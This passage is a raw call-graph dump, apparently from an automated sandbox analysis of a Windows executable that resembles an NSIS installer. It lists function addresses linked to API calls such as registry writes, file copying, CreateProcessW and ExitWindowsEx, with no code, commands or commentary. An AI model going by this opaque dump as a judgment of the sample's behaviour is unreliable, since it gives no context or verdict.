4241->4244 4246 404f72 25 API calls 4242->4246 4247 405181 4243->4247 4244->4233 4248 406805 18 API calls 4245->4248 4246->4241 4249 4062a3 11 API calls 4247->4249 4251 405386 AppendMenuW 4248->4251 4250 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4249->4250 4252 4051f3 4250->4252 4253 4051d7 SendMessageW SendMessageW 4250->4253 4254 405399 GetWindowRect 4251->4254 4255 4053ac 4251->4255 4256 405206 4252->4256 4257 4051f8 SendMessageW 4252->4257 4253->4252 4258 4053b3 TrackPopupMenu 4254->4258 4255->4258 4259 403d3f 19 API calls 4256->4259 4257->4256 4258->4240 4260 4053d1 4258->4260 4261 405216 4259->4261 4262 4053ed SendMessageW 4260->4262 4263 405253 GetDlgItem SendMessageW 4261->4263 4264 40521f ShowWindow 4261->4264 4262->4262 4265 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4262->4265 4263->4240 4268 405276 SendMessageW SendMessageW 4263->4268 4266 405242 4264->4266 4267 405235 ShowWindow 4264->4267 4269 40542f SendMessageW 4265->4269 4273 403d98 SendMessageW 4266->4273 4267->4266 4268->4240 4269->4269 4270 40545a GlobalUnlock SetClipboardData CloseClipboard 4269->4270 4270->4240 4272->4230 4273->4263 4274->4229 4454 4030cf 4455 40145c 18 API calls 4454->4455 4456 4030d6 4455->4456 4458 4030dc 4456->4458 4461 4063ac GlobalAlloc lstrlenW 4456->4461 4459 4030e3 4458->4459 4488 405f51 wsprintfW 4458->4488 4462 4063e2 4461->4462 4463 406434 4461->4463 4464 40640f GetVersionExW 4462->4464 4489 40602b CharUpperW 4462->4489 4463->4458 4464->4463 4465 40643e 4464->4465 4466 406464 LoadLibraryA 4465->4466 4467 40644d 4465->4467 4466->4463 4470 406482 GetProcAddress GetProcAddress GetProcAddress 4466->4470 4467->4463 4469 406585 GlobalFree 4467->4469 4471 40659b LoadLibraryA 4469->4471 4472 4066dd FreeLibrary 4469->4472 4475 4064aa 4470->4475 4478 4065f5 4470->4478 4471->4463 4474 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4471->4474 4472->4463 4473 406651 FreeLibrary 4482 40662a 4473->4482 4474->4478 4476 4064ce FreeLibrary GlobalFree 4475->4476 4475->4478 4484 4064ea 4475->4484 4476->4463 4477 4066ea 4480 4066ef CloseHandle FreeLibrary 4477->4480 4478->4473 4478->4482 4479 4064fc lstrcpyW OpenProcess 4481 40654f CloseHandle CharUpperW lstrcmpW 4479->4481 4479->4484 4483 406704 CloseHandle 4480->4483 4481->4478 4481->4484 4482->4477 4485 406685 lstrcmpW 4482->4485 4486 4066b6 CloseHandle 4482->4486 4487 4066d4 CloseHandle 4482->4487 4483->4480 4484->4469 4484->4479 4484->4481 4485->4482 4485->4483 4486->4482 4487->4472 4488->4459 4489->4462 4490 407752 4494 407344 4490->4494 4491 407c6d 4492 4073c2 GlobalFree 4493 4073cb GlobalAlloc 4492->4493 4493->4491 4493->4494 4494->4491 4494->4492 4494->4493 4494->4494 4495 407443 GlobalAlloc 4494->4495 4496 40743a GlobalFree 4494->4496 4495->4491 4495->4494 4496->4495 4497 401dd3 4498 401446 18 API calls 4497->4498 4499 401dda 4498->4499 4500 401446 18 API calls 4499->4500 4501 4018d3 4500->4501 4509 402e55 4510 40145c 18 API calls 4509->4510 4511 402e63 4510->4511 4512 402e79 4511->4512 4513 40145c 18 API calls 4511->4513 4514 405e30 2 API calls 4512->4514 4513->4512 4515 402e7f 4514->4515 4539 405e50 GetFileAttributesW CreateFileW 4515->4539 4517 402e8c 4518 402f35 4517->4518 4519 402e98 GlobalAlloc 4517->4519 4522 4062a3 11 API calls 4518->4522 4520 402eb1 4519->4520 4521 402f2c CloseHandle 4519->4521 4540 403368 SetFilePointer 4520->4540 4521->4518 4524 402f45 4522->4524 4526 402f50 DeleteFileW 4524->4526 4527 402f63 4524->4527 4525 402eb7 4529 403336 ReadFile 4525->4529 4526->4527 4541 401435 4527->4541 4530 402ec0 GlobalAlloc 4529->4530 4531 402ed0 4530->4531 4532 402f04 WriteFile GlobalFree 4530->4532 4533 40337f 37 API calls 4531->4533 4534 40337f 37 API calls 4532->4534 4538 402edd 4533->4538 4535 402f29 4534->4535 4535->4521 4537 402efb GlobalFree 4537->4532 4538->4537 4539->4517 4540->4525 4542 404f72 25 API calls 4541->4542 4543 401443 4542->4543 4544 401cd5 4545 401446 18 API calls 4544->4545 4546 401cdd 4545->4546 4547 401446 18 API calls 4546->4547 4548 401ce8 4547->4548 4549 40145c 18 API calls 4548->4549 4550 401cf1 4549->4550 4551 401d07 lstrlenW 4550->4551 4552 401d43 4550->4552 4553 401d11 4551->4553 4553->4552 4557 406009 lstrcpynW 4553->4557 4555 401d2c 4555->4552 4556 401d39 lstrlenW 4555->4556 4556->4552 4557->4555 4558 403cd6 4559 403ce1 4558->4559 4560 403ce5 4559->4560 4561 403ce8 GlobalAlloc 4559->4561 4561->4560 4562 402cd7 4563 401446 18 API calls 4562->4563 4566 402c64 4563->4566 4564 402d99 4565 402d17 ReadFile 4565->4566 4566->4562 4566->4564 4566->4565 4567 402dd8 4568 402ddf 4567->4568 4569 4030e3 4567->4569 4570 402de5 FindClose 4568->4570 4570->4569 4571 401d5c 4572 40145c 18 API calls 4571->4572 4573 401d63 4572->4573 4574 40145c 18 API calls 4573->4574 4575 401d6c 4574->4575 4576 401d73 lstrcmpiW 4575->4576 4577 401d86 lstrcmpW 4575->4577 4578 401d79 4576->4578 4577->4578 4579 401c99 4577->4579 4578->4577 4578->4579 4281 407c5f 4282 407344 4281->4282 4283 4073c2 GlobalFree 4282->4283 4284 4073cb GlobalAlloc 4282->4284 4285 407c6d 4282->4285 4286 407443 GlobalAlloc 4282->4286 4287 40743a GlobalFree 4282->4287 4283->4284 4284->4282 4284->4285 4286->4282 4286->4285 4287->4286 4580 404363 4581 404373 4580->4581 4582 40439c 4580->4582 4584 403d3f 19 API calls 4581->4584 4583 403dca 8 API calls 4582->4583 4585 4043a8 4583->4585 4586 404380 SetDlgItemTextW 4584->4586 4586->4582 4587 4027e3 4588 4027e9 4587->4588 4589 4027f2 4588->4589 4590 402836 4588->4590 4603 401553 4589->4603 4591 40145c 18 API calls 4590->4591 4593 40283d 4591->4593 4595 4062a3 11 API calls 4593->4595 4594 4027f9 4596 40145c 18 API calls 4594->4596 4601 401a13 4594->4601 4597 40284d 4595->4597 4598 40280a RegDeleteValueW 4596->4598 4607 40149d RegOpenKeyExW 4597->4607 4599 4062a3 11 API calls 4598->4599 4602 40282a RegCloseKey 4599->4602 4602->4601 4604 401563 4603->4604 4605 40145c 18 API calls 4604->4605 4606 401589 RegOpenKeyExW 4605->4606 4606->4594 4613 401515 4607->4613 4615 4014c9 4607->4615 4608 4014ef RegEnumKeyW 4609 401501 RegCloseKey 4608->4609 4608->4615 4610 4062fc 3 API calls 4609->4610 4612 401511 4610->4612 4611 401526 RegCloseKey 4611->4613 4612->4613 4616 401541 RegDeleteKeyW 4612->4616 4613->4601 4614 40149d 3 API calls 4614->4615 4615->4608 4615->4609 4615->4611 4615->4614 4616->4613 4617 403f64 4618 403f90 4617->4618 4619 403f74 4617->4619 4621 403fc3 4618->4621 4622 403f96 SHGetPathFromIDListW 4618->4622 4628 405c84 GetDlgItemTextW 4619->4628 4624 403fad SendMessageW 4622->4624 4625 403fa6 4622->4625 4623 403f81 SendMessageW 4623->4618 4624->4621 4626 40141d 80 API calls 4625->4626 4626->4624 4628->4623 4629 402ae4 4630 402aeb 4629->4630 4631 4030e3 4629->4631 4632 402af2 CloseHandle 4630->4632 4632->4631 4633 402065 4634 401446 18 API calls 4633->4634 4635 40206d 4634->4635 4636 401446 18 API calls 4635->4636 4637 402076 GetDlgItem 4636->4637 4638 4030dc 4637->4638 4639 4030e3 4638->4639 4641 405f51 wsprintfW 4638->4641 4641->4639 4642 402665 4643 40145c 18 API calls 4642->4643 4644 40266b 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402674 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40267d 4647->4648 4649 4062a3 11 API calls 4648->4649 4650 40268c 4649->4650 4651 4062d5 2 API calls 4650->4651 4652 402695 4651->4652 4653 4026a6 lstrlenW lstrlenW 4652->4653 4654 404f72 25 API calls 4652->4654 4657 4030e3 4652->4657 4655 404f72 25 API calls 4653->4655 4654->4652 4656 4026e8 SHFileOperationW 4655->4656 4656->4652 4656->4657 4665 401c69 4666 40145c 18 API calls 4665->4666 4667 401c70 4666->4667 4668 4062a3 11 API calls 4667->4668 4669 401c80 4668->4669 4670 405ca0 MessageBoxIndirectW 4669->4670 4671 401a13 4670->4671 4679 402f6e 4680 402f72 4679->4680 4681 402fae 4679->4681 4682 4062a3 11 API calls 4680->4682 4683 40145c 18 API calls 4681->4683 4684 402f7d 4682->4684 4689 402f9d 4683->4689 4685 4062a3 11 API calls 4684->4685 4686 402f90 4685->4686 4687 402fa2 4686->4687 4688 402f98 4686->4688 4691 4060e7 9 API calls 4687->4691 4690 403e74 5 API calls 4688->4690 4690->4689 4691->4689 4692 4023f0 4693 402403 4692->4693 4694 4024da 4692->4694 4695 40145c 18 API calls 4693->4695 4696 404f72 25 API calls 4694->4696 4697 40240a 4695->4697 4702 4024f1 4696->4702 4698 40145c 18 API calls 4697->4698 4699 402413 4698->4699 4700 402429 LoadLibraryExW 4699->4700 4701 40241b GetModuleHandleW 4699->4701 4703 40243e 4700->4703 4704 4024ce 4700->4704 4701->4700 4701->4703 4716 406365 GlobalAlloc WideCharToMultiByte 4703->4716 4705 404f72 25 API calls 4704->4705 4705->4694 4707 402449 4708 40248c 4707->4708 4709 40244f 4707->4709 4710 404f72 25 API calls 4708->4710 4712 401435 25 API calls 4709->4712 4714 40245f 4709->4714 4711 402496 4710->4711 4713 4062a3 11 API calls 4711->4713 4712->4714 4713->4714 4714->4702 4715 4024c0 FreeLibrary 4714->4715 4715->4702 4717 406390 GetProcAddress 4716->4717 4718 40639d GlobalFree 4716->4718 4717->4718 4718->4707 4719 402df3 4720 402dfa 4719->4720 4722 4019ec 4719->4722 4721 402e07 FindNextFileW 4720->4721 4721->4722 4723 402e16 4721->4723 4725 406009 lstrcpynW 4723->4725 4725->4722 4078 402175 4079 401446 18 API calls 4078->4079 4080 40217c 4079->4080 4081 401446 18 API calls 4080->4081 4082 402186 4081->4082 4083 4062a3 11 API calls 4082->4083 4087 402197 4082->4087 4083->4087 4084 4021aa EnableWindow 4086 4030e3 4084->4086 4085 40219f ShowWindow 4085->4086 4087->4084 4087->4085 4733 404077 4734 404081 4733->4734 4735 404084 lstrcpynW lstrlenW 4733->4735 4734->4735 4104 405479 4105 405491 4104->4105 4106 4055cd 4104->4106 4105->4106 4107 40549d 4105->4107 4108 40561e 4106->4108 4109 4055de GetDlgItem GetDlgItem 4106->4109 4110 4054a8 SetWindowPos 4107->4110 4111 4054bb 4107->4111 4113 405678 4108->4113 4121 40139d 80 API calls 4108->4121 4112 403d3f 19 API calls 4109->4112 4110->4111 4115 4054c0 ShowWindow 4111->4115 4116 4054d8 4111->4116 4117 405608 SetClassLongW 4112->4117 4114 403daf SendMessageW 4113->4114 4134 4055c8 4113->4134 4144 40568a 4114->4144 4115->4116 4118 4054e0 DestroyWindow 4116->4118 4119 4054fa 4116->4119 4120 40141d 80 API calls 4117->4120 4173 4058dc 4118->4173 4122 405510 4119->4122 4123 4054ff SetWindowLongW 4119->4123 4120->4108 4124 405650 4121->4124 4127 4055b9 4122->4127 4128 40551c GetDlgItem 4122->4128 4123->4134 4124->4113 4129 405654 SendMessageW 4124->4129 4125 40141d 80 API calls 4125->4144 4126 4058de DestroyWindow KiUserCallbackDispatcher 4126->4173 4183 403dca 4127->4183 4132 40554c 4128->4132 4133 40552f SendMessageW IsWindowEnabled 4128->4133 4129->4134 4131 40590d ShowWindow 4131->4134 4136 405559 4132->4136 4137 4055a0 SendMessageW 4132->4137 4138 40556c 4132->4138 4147 405551 4132->4147 4133->4132 4133->4134 4135 406805 18 API calls 4135->4144 4136->4137 4136->4147 4137->4127 4141 405574 4138->4141 4142 405589 4138->4142 4140 403d3f 19 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4146 40141d 80 API calls 4142->4146 4143 405587 4143->4127 4144->4125 4144->4126 4144->4134 4144->4135 4144->4140 4164 40581e DestroyWindow 4144->4164 4174 403d3f 4144->4174 4145->4147 4148 405590 4146->4148 4180 403d18 4147->4180 4148->4127 4148->4147 4150 405705 GetDlgItem 4151 405723 ShowWindow KiUserCallbackDispatcher 4150->4151 4152 40571a 4150->4152 4177 403d85 KiUserCallbackDispatcher 4151->4177 4152->4151 4154 40574d EnableWindow 4157 405761 4154->4157 4155 405766 GetSystemMenu EnableMenuItem SendMessageW 4156 405796 SendMessageW 4155->4156 4155->4157 4156->4157 4157->4155 4178 403d98 SendMessageW 4157->4178 4179 406009 lstrcpynW 4157->4179 4160 4057c4 lstrlenW 4161 406805 18 API calls 4160->4161 4162 4057da SetWindowTextW 4161->4162 4163 40139d 80 API calls 4162->4163 4163->4144 4165 405838 CreateDialogParamW 4164->4165 4164->4173 4166 40586b 4165->4166 4165->4173 4167 403d3f 19 API calls 4166->4167 4168 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4167->4168 4169 40139d 80 API calls 4168->4169 4170 4058bc 4169->4170 4170->4134 4171 4058c4 ShowWindow 4170->4171 4172 403daf SendMessageW 4171->4172 4172->4173 4173->4131 4173->4134 4175 406805 18 API calls 4174->4175 4176 403d4a SetDlgItemTextW 4175->4176 4176->4150 4177->4154 4178->4157 4179->4160 4181 403d25 SendMessageW 4180->4181 4182 403d1f 4180->4182 4181->4143 4182->4181 4184 403ddf GetWindowLongW 4183->4184 4194 403e68 4183->4194 4185 403df0 4184->4185 4184->4194 4186 403e02 4185->4186 4187 403dff GetSysColor 4185->4187 4188 403e12 SetBkMode 4186->4188 4189 403e08 SetTextColor 4186->4189 4187->4186 4190 403e30 4188->4190 4191 403e2a GetSysColor 4188->4191 4189->4188 4192 403e41 4190->4192 4193 403e37 SetBkColor 4190->4193 4191->4190 4192->4194 4195 403e54 DeleteObject 4192->4195 4196 403e5b CreateBrushIndirect 4192->4196 4193->4192 4194->4134 4195->4196 4196->4194 4736 4020f9 GetDC GetDeviceCaps 4737 401446 18 API calls 4736->4737 4738 402116 MulDiv 4737->4738 4739 401446 18 API calls 4738->4739 4740 40212c 4739->4740 4741 406805 18 API calls 4740->4741 4742 402165 CreateFontIndirectW 4741->4742 4743 4030dc 4742->4743 4744 4030e3 4743->4744 4746 405f51 wsprintfW 4743->4746 4746->4744 4747 4024fb 4748 40145c 18 API calls 4747->4748 4749 402502 4748->4749 4750 40145c 18 API calls 4749->4750 4751 40250c 4750->4751 4752 40145c 18 API calls 4751->4752 4753 402515 4752->4753 4754 40145c 18 API calls 4753->4754 4755 40251f 4754->4755 4756 40145c 18 API calls 4755->4756 4757 402529 4756->4757 4758 40253d 4757->4758 4759 40145c 18 API calls 4757->4759 4760 4062a3 11 API calls 4758->4760 4759->4758 4761 40256a CoCreateInstance 4760->4761 4762 40258c 4761->4762 4763 40497c GetDlgItem GetDlgItem 4764 4049d2 7 API calls 4763->4764 4769 404bea 4763->4769 4765 404a76 DeleteObject 4764->4765 4766 404a6a SendMessageW 4764->4766 4767 404a81 4765->4767 4766->4765 4770 404ab8 4767->4770 4772 406805 18 API calls 4767->4772 4768 404ccf 4771 404d74 4768->4771 4776 404bdd 4768->4776 4781 404d1e SendMessageW 4768->4781 4769->4768 4779 40484e 5 API calls 4769->4779 4792 404c5a 4769->4792 4775 403d3f 19 API calls 4770->4775 4773 404d89 4771->4773 4774 404d7d SendMessageW 4771->4774 4778 404a9a SendMessageW SendMessageW 4772->4778 4783 404da2 4773->4783 4784 404d9b ImageList_Destroy 4773->4784 4794 404db2 4773->4794 4774->4773 4780 404acc 4775->4780 4782 403dca 8 API calls 4776->4782 4777 404cc1 SendMessageW 4777->4768 4778->4767 4779->4792 4785 403d3f 19 API calls 4780->4785 4781->4776 4787 404d33 SendMessageW 4781->4787 4788 404f6b 4782->4788 4789 404dab GlobalFree 4783->4789 4783->4794 4784->4783 4790 404add 4785->4790 4786 404f1c 4786->4776 4795 404f31 ShowWindow GetDlgItem ShowWindow 4786->4795 4791 404d46 4787->4791 4789->4794 4793 404baa GetWindowLongW SetWindowLongW 4790->4793 4802 404ba4 4790->4802 4805 404b39 SendMessageW 4790->4805 4806 404b67 SendMessageW 4790->4806 4807 404b7b SendMessageW 4790->4807 4801 404d57 SendMessageW 4791->4801 4792->4768 4792->4777 4796 404bc4 4793->4796 4794->4786 4797 404de4 4794->4797 4800 40141d 80 API calls 4794->4800 4795->4776 4798 404be2 4796->4798 4799 404bca ShowWindow 4796->4799 4810 404e12 SendMessageW 4797->4810 4813 404e28 4797->4813 4815 403d98 SendMessageW 4798->4815 4814 403d98 SendMessageW 4799->4814 4800->4797 4801->4771 4802->4793 4802->4796 4805->4790 4806->4790 4807->4790 4808 404ef3 InvalidateRect 4808->4786 4809 404f09 4808->4809 4816 4043ad 4809->4816 4810->4813 4812 404ea1 SendMessageW SendMessageW 4812->4813 4813->4808 4813->4812 4814->4776 4815->4769 4817 4043cd 4816->4817 4818 406805 18 API calls 4817->4818 4819 40440d 4818->4819 4820 406805 18 API calls 4819->4820 4821 404418 4820->4821 4822 406805 18 API calls 4821->4822 4823 404428 lstrlenW wsprintfW SetDlgItemTextW 4822->4823 4823->4786 4824 4026fc 4825 401ee4 4824->4825 4827 402708 4824->4827 4825->4824 4826 406805 18 API calls 4825->4826 4826->4825 4276 4019fd 4277 40145c 18 API calls 4276->4277 4278 401a04 4277->4278 4279 405e7f 2 API calls 4278->4279 4280 401a0b 4279->4280 4828 4022fd 4829 40145c 18 API calls 4828->4829 4830 402304 GetFileVersionInfoSizeW 4829->4830 4831 40232b GlobalAlloc 4830->4831 4835 4030e3 4830->4835 4832 40233f GetFileVersionInfoW 4831->4832 4831->4835 4833 402350 VerQueryValueW 4832->4833 4834 402381 GlobalFree 4832->4834 4833->4834 4837 402369 4833->4837 4834->4835 4841 405f51 wsprintfW 4837->4841 4839 402375 4842 405f51 wsprintfW 4839->4842 4841->4839 4842->4834 4843 402afd 4844 40145c 18 API calls 4843->4844 4845 402b04 4844->4845 4850 405e50 GetFileAttributesW CreateFileW 4845->4850 4847 402b10 4848 4030e3 4847->4848 4851 405f51 wsprintfW 4847->4851 4850->4847 4851->4848 4852 4029ff 4853 401553 19 API calls 4852->4853 4854 402a09 4853->4854 4855 40145c 18 API calls 4854->4855 4856 402a12 4855->4856 4857 402a1f RegQueryValueExW 4856->4857 4859 401a13 4856->4859 4858 402a3f 4857->4858 4862 402a45 4857->4862 4858->4862 4863 405f51 wsprintfW 4858->4863 4861 4029e4 RegCloseKey 4861->4859 4862->4859 4862->4861 4863->4862 4864 401000 4865 401037 BeginPaint GetClientRect 4864->4865 4866 40100c DefWindowProcW 4864->4866 4868 4010fc 4865->4868 4869 401182 4866->4869 4870 401073 CreateBrushIndirect FillRect DeleteObject 4868->4870 4871 401105 4868->4871 4870->4868 4872 401170 EndPaint 4871->4872 4873 40110b CreateFontIndirectW 4871->4873 4872->4869 4873->4872 4874 40111b 6 API calls 4873->4874 4874->4872 4875 401f80 4876 401446 18 API calls 4875->4876 4877 401f88 4876->4877 4878 401446 18 API calls 4877->4878 4879 401f93 4878->4879 4880 401fa3 4879->4880 4881 40145c 18 API calls 4879->4881 4882 401fb3 4880->4882 4883 40145c 18 API calls 4880->4883 4881->4880 4884 402006 4882->4884 4885 401fbc 4882->4885 4883->4882 4887 40145c 18 API calls 4884->4887 4886 401446 18 API calls 4885->4886 4889 401fc4 4886->4889 4888 40200d 4887->4888 4890 40145c 18 API calls 4888->4890 4891 401446 18 API calls 4889->4891 4892 402016 FindWindowExW 4890->4892 4893 401fce 4891->4893 4897 402036 4892->4897 4894 401ff6 SendMessageW 4893->4894 4895 401fd8 SendMessageTimeoutW 4893->4895 4894->4897 4895->4897 4896 4030e3 4897->4896 4899 405f51 wsprintfW 4897->4899 4899->4896 4900 402880 4901 402884 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028a7 4902->4903 4904 40145c 18 API calls 4903->4904 4905 4028b1 4904->4905 4906 4028ba RegCreateKeyExW 4905->4906 4907 4028e8 4906->4907 4914 4029ef 4906->4914 4908 402934 4907->4908 4909 40145c 18 API calls 4907->4909 4910 402963 4908->4910 4913 401446 18 API calls 4908->4913 4912 4028fc lstrlenW 4909->4912 4911 4029ae RegSetValueExW 4910->4911 4915 40337f 37 API calls 4910->4915 4918 4029c6 RegCloseKey 4911->4918 4919 4029cb 4911->4919 4916 402918 4912->4916 4917 40292a 4912->4917 4920 402947 4913->4920 4921 40297b 4915->4921 4922 4062a3 11 API calls 4916->4922 4923 4062a3 11 API calls 4917->4923 4918->4914 4924 4062a3 11 API calls 4919->4924 4925 4062a3 11 API calls 4920->4925 4931 406224 4921->4931 4927 402922 4922->4927 4923->4908 4924->4918 4925->4910 4927->4911 4930 4062a3 11 API calls 4930->4927 4932 406247 4931->4932 4933 40628a 4932->4933 4934 40625c wsprintfW 4932->4934 4935 402991 4933->4935 4936 406293 lstrcatW 4933->4936 4934->4933 4934->4934 4935->4930 4936->4935 4937 402082 4938 401446 18 API calls 4937->4938 4939 402093 SetWindowLongW 4938->4939 4940 4030e3 4939->4940 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3966 403c83 3640->3966 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4023 406009 lstrcpynW 3651->4023 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4024 405e50 GetFileAttributesW CreateFileW 3674->4024 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4027 406009 lstrcpynW 3684->4027 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4025 405f51 wsprintfW 3696->4025 4026 406009 lstrcpynW 3696->4026 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4028 406a99 lstrcpyW 3704->4028 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 